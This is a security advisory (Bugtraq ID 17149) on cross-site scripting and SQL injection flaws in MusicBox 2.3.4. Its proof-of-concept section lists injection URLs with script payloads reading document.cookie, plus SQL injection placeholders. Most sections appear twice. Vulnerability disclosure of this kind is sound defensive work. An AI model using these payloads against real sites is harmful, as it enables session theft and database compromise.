MusicBox Multiple Input Validation Vulnerabilities
BID:17149
Info
MusicBox Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 17149 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 18 2006 12:00AM |
| Updated: | Jul 24 2006 11:07PM |
| Credit: | Discovery is credited to Linux_Drox. |
| Vulnerable: |
MusicBox MusicBox 2.3.4 MusicBox MusicBox 2.3 Beta 2 |
| Not Vulnerable: | |
Discussion
MusicBox Multiple Input Validation Vulnerabilities
MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
Exploit / POC
MusicBox Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a web client.
The following examples were provided to demonstrate cross-site scripting:
http://www.example.com/music/index.php?id='><script>alert(document.cookie)</script>
http://www.example.com/music/index.php?action=top&show=5&type='><script>alert(d ocument.cookie)</script>
http://www.example.com/music/index.php?action=top&show='><script>alert(document .cookie)</script>&type=Artists
http://www.example.com/music/cart/cart.php?message1='><script>alert(document.cookie) </script>
http://www.example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script>
The following examples were provided to demonstrate SQL injection:
http://www.example.com/music/index.php?action=top&show=5&type=[SQL]
http://www.example.com/music/index.php?action=top&show=[SQL]&type=Artists
Attackers can exploit these issues via a web client.
The following examples were provided to demonstrate cross-site scripting:
http://www.example.com/music/index.php?id='><script>alert(document.cookie)</script>
http://www.example.com/music/index.php?action=top&show=5&type='><script>alert(d ocument.cookie)</script>
http://www.example.com/music/index.php?action=top&show='><script>alert(document .cookie)</script>&type=Artists
http://www.example.com/music/cart/cart.php?message1='><script>alert(document.cookie) </script>
http://www.example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script>
The following examples were provided to demonstrate SQL injection:
http://www.example.com/music/index.php?action=top&show=5&type=[SQL]
http://www.example.com/music/index.php?action=top&show=[SQL]&type=Artists
Solution / Fix
MusicBox Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
MusicBox Multiple Input Validation Vulnerabilities
References:
References:
- Vendor Homepage (Gonafish)
- MusicBox <= 2.3.4 XSS SQL injection Vulnerability (Ellipsis Security)